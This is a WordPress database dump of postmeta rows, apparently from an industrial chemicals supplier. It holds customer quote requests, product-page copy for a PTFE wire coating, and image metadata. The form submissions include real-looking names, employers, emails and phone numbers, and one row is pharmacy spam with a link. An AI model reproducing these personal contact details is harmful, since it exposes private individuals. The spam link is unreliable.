INSERT INTO `wp_postmeta` VALUES (36633, 4080, '_field_3', 'I am looking for a Fluorocarbon Mold Release, it has an NSN 9150-01-443-9003 and in my system it has two reference numbers MS-122DF and MS-122XD. This product is required to complete repairs and I would require a sales quote so that I can have this item purchased locally. Please forward this to your Canadian distributor as necessary.\n\nPlease reply at your earliest convenience.\n\nThank you,\n\nCpl Daniel Trombley\nIC EO LAV Section\n1 Service Battalion, Edmonton, AB, Canada\n(780) 973-4011 x 4993'); 
INSERT INTO `wp_postmeta` VALUES (36634, 4080, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36635, 4080, '_sub_id', '4080'); 
INSERT INTO `wp_postmeta` VALUES (36636, 4081, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36637, 4081, '_seq_num', '589'); 
INSERT INTO `wp_postmeta` VALUES (36638, 4081, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36639, 4081, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36640, 4081, '_field_1', 'Ramesh Ramji'); 
INSERT INTO `wp_postmeta` VALUES (36641, 4081, '_field_10', 'Illumina'); 
INSERT INTO `wp_postmeta` VALUES (36642, 4081, '_field_2', 'rramji@illumina.com'); 
INSERT INTO `wp_postmeta` VALUES (36643, 4081, '_field_8', '(858) 291-6115'); 
INSERT INTO `wp_postmeta` VALUES (36644, 4081, '_field_3', 'Hi,\r\nCould you send me a quotation for 0.5kg of Krytox 157 FSH and Krytox 157 FSL. \r\n\r\nThanks,\r\nRamesh'); 
INSERT INTO `wp_postmeta` VALUES (36645, 4081, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36646, 4081, '_sub_id', '4081'); 
INSERT INTO `wp_postmeta` VALUES (36647, 4082, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36648, 4082, '_seq_num', '590'); 
INSERT INTO `wp_postmeta` VALUES (36649, 4082, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36650, 4082, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36651, 4082, '_field_1', 'Edward Witek'); 
INSERT INTO `wp_postmeta` VALUES (36652, 4082, '_field_10', 'GE'); 
INSERT INTO `wp_postmeta` VALUES (36653, 4082, '_field_2', 'edwardJ.witek@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (36654, 4082, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36655, 4082, '_field_3', 'I am looking to see what is the shelf life on MS-122AD product. Also how can you get a user name &amp; password to get SDS&#039;s\nThank you for time &amp; have a great day.'); 
INSERT INTO `wp_postmeta` VALUES (36656, 4082, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36657, 4082, '_sub_id', '4082'); 
INSERT INTO `wp_postmeta` VALUES (36658, 4083, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36659, 4083, '_seq_num', '591'); 
INSERT INTO `wp_postmeta` VALUES (36660, 4083, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36661, 4083, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36662, 4083, '_field_1', 'Lena Alston'); 
INSERT INTO `wp_postmeta` VALUES (36663, 4083, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (36664, 4083, '_field_2', 'lenaalston.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36665, 4083, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (36666, 4083, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nLena Alston\r\nDigital Marketing Manager\r\n(877)-228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (36667, 4083, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36668, 4083, '_sub_id', '4083'); 
INSERT INTO `wp_postmeta` VALUES (36669, 4084, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36670, 4084, '_seq_num', '283'); 
INSERT INTO `wp_postmeta` VALUES (36671, 4084, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36672, 4084, '_field_12', 'Richard Hampshire'); 
INSERT INTO `wp_postmeta` VALUES (36673, 4084, '_field_13', 'SUIT-KOTE'); 
INSERT INTO `wp_postmeta` VALUES (36674, 4084, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36675, 4084, '_field_14', 'belmontlab@suit-kote.com'); 
INSERT INTO `wp_postmeta` VALUES (36676, 4084, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (36677, 4084, '_field_16', 'Hello, I am looking for a release agent for a latex storage tank! we use latex in the process of manufacturing asphalt emulsions and the latex sticks to the sides of our storage tank which leaves us to enter and remove it each year at startup! looking at maybe a semi permanent release agent or perhaps one that could be applied yearly!   Thank you, Rich H'); 
INSERT INTO `wp_postmeta` VALUES (36678, 4084, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36679, 4084, '_sub_id', '4084'); 
INSERT INTO `wp_postmeta` VALUES (36680, 4085, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36681, 4085, '_seq_num', '592'); 
INSERT INTO `wp_postmeta` VALUES (36682, 4085, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36683, 4085, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36684, 4085, '_field_1', 'Tom Machell'); 
INSERT INTO `wp_postmeta` VALUES (36685, 4085, '_field_10', 'IMP Aerospace and Defence'); 
INSERT INTO `wp_postmeta` VALUES (36686, 4085, '_field_2', 'tom.machell@impcsh.com'); 
INSERT INTO `wp_postmeta` VALUES (36687, 4085, '_field_8', '(902) 873-2250'); 
INSERT INTO `wp_postmeta` VALUES (36688, 4085, '_field_3', 'Looking for a suitable release agent for Av-DEC Polyurethane Conductive gaskets found here: https://www.avdec.com/products/gaskets/hi-tak-polyurethane-conductive-antenna-gaskets.html \r\nwhen applied to 7075-T6 and 2024-T3 aircraft aluminum.\r\nWe are using these gaskets underneath aircraft antenna mounts and need a suitable release agent to facilitate removal of the antenna and reduce stuck-on residue from the gaskets.\r\n\r\nM-S came highly recommended. What is M-S able to offer and a potential product? A conductive agent would be preferred, but not critical.\r\n\r\nThanks.\r\n\r\nTom'); 
INSERT INTO `wp_postmeta` VALUES (36689, 4085, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36690, 4085, '_sub_id', '4085'); 
INSERT INTO `wp_postmeta` VALUES (36691, 4086, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36692, 4086, '_seq_num', '593'); 
INSERT INTO `wp_postmeta` VALUES (36693, 4086, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36694, 4086, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36695, 4086, '_field_1', 'Bijit Biswas'); 
INSERT INTO `wp_postmeta` VALUES (36696, 4086, '_field_10', 'SAMEER, Kolkata, India '); 
INSERT INTO `wp_postmeta` VALUES (36697, 4086, '_field_2', 'bijit@mmw.sameer.gov.in'); 
INSERT INTO `wp_postmeta` VALUES (36698, 4086, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36699, 4086, '_field_3', 'We are interested to procure following two items from you.\r\n1. MS-111 Epoxy Stripping Agent\r\n2. MS-462H Silicone Conformal Coating\r\nKindly let us know whether you are in a position to supply us these products in India. Also provide us quotation for the items for one quart each. '); 
INSERT INTO `wp_postmeta` VALUES (36700, 4086, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36701, 4086, '_sub_id', '4086'); 
INSERT INTO `wp_postmeta` VALUES (36702, 4087, '_wp_attached_file', '2016/08/MS-460H-462H.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36703, 4088, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36704, 4088, '_seq_num', '284'); 
INSERT INTO `wp_postmeta` VALUES (36705, 4088, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36706, 4088, '_field_12', 'Camile Schneebeli'); 
INSERT INTO `wp_postmeta` VALUES (36707, 4088, '_field_13', 'AW Tronics'); 
INSERT INTO `wp_postmeta` VALUES (36708, 4088, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36709, 4088, '_field_14', 'camile.schneebeli@awtronics.com'); 
INSERT INTO `wp_postmeta` VALUES (36710, 4088, '_field_15', '(786) 288-7835'); 
INSERT INTO `wp_postmeta` VALUES (36711, 4088, '_field_16', 'Please quote 06 pcs of KRYTOX AGL 683'); 
INSERT INTO `wp_postmeta` VALUES (36712, 4088, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36713, 4088, '_sub_id', '4088'); 
INSERT INTO `wp_postmeta` VALUES (36714, 4089, '_wp_attached_file', '2017/04/ShieldSys-520.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36715, 3989, '318_custom_list_file', 'a:1:{s:32:"7434c4e29aa8535c00808b88564c2235";a:3:{s:4:"name";s:13:"ShieldSys 520";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2017/04/ShieldSys-520.pdf";s:4:"desc";s:43:"Insulator & Conductor Coating ShieldSys 520";}}'); 
INSERT INTO `wp_postmeta` VALUES (36716, 4090, '_edit_lock', '1498492798:3'); 
INSERT INTO `wp_postmeta` VALUES (36717, 4090, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (36718, 4091, '_wp_attached_file', '2017/04/shutterstock_429063457.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36719, 4091, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/04/shutterstock_429063457.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429063457-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_429063457-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_429063457-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429063457-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429063457-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_429063457-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_429063457-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36720, 4091, '_wp_attachment_image_alt', 'ShieldSys 402'); 
INSERT INTO `wp_postmeta` VALUES (36721, 4092, '_wp_attached_file', '2017/04/shutterstock_105928856-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36722, 4092, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:1000;s:4:"file";s:36:"2017/04/shutterstock_105928856-2.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"shutterstock_105928856-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (36723, 4090, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (36724, 4090, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (36725, 4090, '_thumbnail_id', '4092'); 
INSERT INTO `wp_postmeta` VALUES (36726, 4090, '312_default_editor', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Fluorochemical\r\n\r\nAppearance:………...White\r\n\r\nOdor:…………………Alcoholic\r\n\r\nSpecific Gravity:…….0.83 g/mL @ 25°C\r\n\r\nFlash Point…………..12.0 °C'); 
INSERT INTO `wp_postmeta` VALUES (36727, 4090, '716_default_editor', '<strong>Recommended Application Procedure</strong><strong>:</strong>\r\n<ul>\r\n 	<li>Dipping and Flooding – The easiest and most widely used method.</li>\r\n 	<li>Spraying – Particularly effective in depositing a very thin coating with excellent adhesion.</li>\r\n 	<li>Wiping or Brushing – Very effective for coating small amounts of selected areas on a wire or cable.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (36728, 4090, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36729, 4090, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36730, 4090, '317_default_editor', '<ul>\r\n 	<li>Quart</li>\r\n 	<li>Gallons</li>\r\n 	<li>55 Gallon Drum</li>\r\n 	<li>275 Gallon Totes</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (36731, 4090, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36732, 4090, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (36733, 4090, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (36734, 4090, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (36735, 4090, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (36736, 4090, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (36737, 4090, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36738, 4090, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36739, 4090, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (36740, 4090, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36741, 4090, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (36742, 4090, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (36743, 4090, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (36744, 4090, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (36745, 4090, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (36746, 4090, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (36747, 4090, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (36748, 4090, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (36749, 4090, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (36750, 4090, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (36751, 4090, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (36752, 4090, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (36753, 4090, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36754, 4090, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36755, 4090, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (36756, 4090, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (36757, 4090, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (36758, 4090, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (36759, 4090, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36760, 4090, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (36761, 4090, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (36762, 4090, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (36763, 4090, '_ywtm_content_tab_description', '<h2><strong>ShieldSys 402 PTFE Wire Coatings Introduction</strong></h2>\r\nShieldSys 402 <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coatings are designed to provide unmatched lubricity and anti-stick properties to all wires, cables, and composites materials. ShieldSys 402 wire coating is a isopropyl alcohol based dispersion offering accelerated dry and cure times relatives to ShieldSys 815 and 520.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 402 is a proprietary PTFE wire coating formulation providing unmatched surface adhesion, durability and wear resistance to applied surfaces.\r\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\r\nShieldSys 402 exhibit outstanding lubricity and extremely low coefficient of friction. Coating wire conductors provides a nonstick surface so insulation strips away easily. Coating insulated wire provides nonstick so multiple twisted wires do not stick together. The patented polymer is thermally stable and can be used at temperatures up to 250°C . The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\r\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\r\nShieldSys 402 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\r\n<h4><strong>Coating and Wire Stripping:</strong></h4>\r\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. DryFilm dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Applications include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\r\n<h4><strong>Processing Details:</strong></h4>\r\nThe application of ShieldSys DryFilm products fits easily into most wire production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat the wire. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation or spooling. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol like ShieldSys 402 PTFE Wire Coatings.'); 
INSERT INTO `wp_postmeta` VALUES (36764, 4090, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (36765, 4090, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (36766, 4090, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (36767, 4090, '_yoast_wpseo_focuskw_text_input', 'PTFE Wire Coatings'); 
INSERT INTO `wp_postmeta` VALUES (36768, 4090, '_yoast_wpseo_focuskw', 'PTFE Wire Coatings'); 
INSERT INTO `wp_postmeta` VALUES (36769, 4090, '_yoast_wpseo_title', 'PTFE Wire Coatings | ShieldSys 402 | Industrial Wire and Cable Coatings |'); 
INSERT INTO `wp_postmeta` VALUES (36770, 4090, '_yoast_wpseo_metadesc', 'ShieldSys 402 PTFE Wire Coatings are an high lubricity, anti-stick, abrasion-resistance coating for all metal, plastic, and composite materials.'); 
INSERT INTO `wp_postmeta` VALUES (36771, 4090, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (36772, 4090, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (36773, 4090, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (36774, 4092, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (36775, 4097, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36776, 4097, '_seq_num', '594'); 
INSERT INTO `wp_postmeta` VALUES (36777, 4097, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36778, 4097, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36779, 4097, '_field_1', 'Miguel Sandoval'); 
INSERT INTO `wp_postmeta` VALUES (36780, 4097, '_field_10', 'Littelfuse Inc.'); 
INSERT INTO `wp_postmeta` VALUES (36781, 4097, '_field_2', 'Msandoval@littelfuse.com'); 
INSERT INTO `wp_postmeta` VALUES (36782, 4097, '_field_8', '(650) 222-1049'); 
INSERT INTO `wp_postmeta` VALUES (36783, 4097, '_field_3', 'Looking for Krytox grease range temperature 200C-375C degress at high pressure load on the bearings, can you tell me if you have a grease that we can use. Thanks for your help.\r\n\r\nMiguel Sandoval'); 
INSERT INTO `wp_postmeta` VALUES (36784, 4097, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36785, 4097, '_sub_id', '4097'); 
INSERT INTO `wp_postmeta` VALUES (36786, 4098, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36787, 4098, '_seq_num', '595'); 
INSERT INTO `wp_postmeta` VALUES (36788, 4098, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36789, 4098, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36790, 4098, '_field_1', 'Chasity'); 
INSERT INTO `wp_postmeta` VALUES (36791, 4098, '_field_10', 'Community Health Network'); 
INSERT INTO `wp_postmeta` VALUES (36792, 4098, '_field_2', 'cgreer@ecommunity.com'); 
INSERT INTO `wp_postmeta` VALUES (36793, 4098, '_field_8', '(317) 355-4146'); 
INSERT INTO `wp_postmeta` VALUES (36794, 4098, '_field_3', 'Hello,\nWe are collecting Tax Identification information from suppliers in our database.  Currently we do not have a W9 or Tax Identification Number on record from your company.  \n\nPlease forward a copy of your W9 preferably PDF doc so that I can attach this information to your record.  Please contact me if you have any questions.\n\n\nThanks,\n\n'); 
INSERT INTO `wp_postmeta` VALUES (36795, 4098, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36796, 4098, '_sub_id', '4098'); 
INSERT INTO `wp_postmeta` VALUES (36797, 4099, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36798, 4099, '_seq_num', '596'); 
INSERT INTO `wp_postmeta` VALUES (36799, 4099, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36800, 4099, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36801, 4099, '_field_1', 'VicentenipKK'); 
INSERT INTO `wp_postmeta` VALUES (36802, 4099, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (36803, 4099, '_field_2', 'huahskfpolksd@yandex.com'); 
INSERT INTO `wp_postmeta` VALUES (36804, 4099, '_field_8', '88712427749'); 
INSERT INTO `wp_postmeta` VALUES (36805, 4099, '_field_3', 'w http://genericialischeap.com cialis 20 mg tablet &lt;a href=&quot;http://genericialischeap.com&quot;&gt;cialis 20 mg&lt;/a&gt; online order cialis overnight delivery'); 
INSERT INTO `wp_postmeta` VALUES (36806, 4099, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36807, 4099, '_sub_id', '4099'); 
INSERT INTO `wp_postmeta` VALUES (36808, 4100, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36809, 4100, '_seq_num', '597'); 
INSERT INTO `wp_postmeta` VALUES (36810, 4100, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36811, 4100, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36812, 4100, '_field_1', 'Naseem Khan'); 
INSERT INTO `wp_postmeta` VALUES (36813, 4100, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36814, 4100, '_field_2', 'njk@alsaadagt.ae'); 
INSERT INTO `wp_postmeta` VALUES (36815, 4100, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36816, 4100, '_field_3', 'Interested in import of petrol and diesel engine oils, please send product and price catalaog.'); 
INSERT INTO `wp_postmeta` VALUES (36817, 4100, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36818, 4100, '_sub_id', '4100'); 
INSERT INTO `wp_postmeta` VALUES (36819, 1711, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36820, 1711, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (36821, 1711, '_yoast_wpseo_linkdex', '30'); 
INSERT INTO `wp_postmeta` VALUES (36822, 4102, '_wp_attached_file', '2017/05/shutterstock_195767891.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36823, 4102, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_195767891.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_195767891-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_195767891-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_195767891-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_195767891-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_195767891-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_195767891-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_195767891-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:63;s:4:"w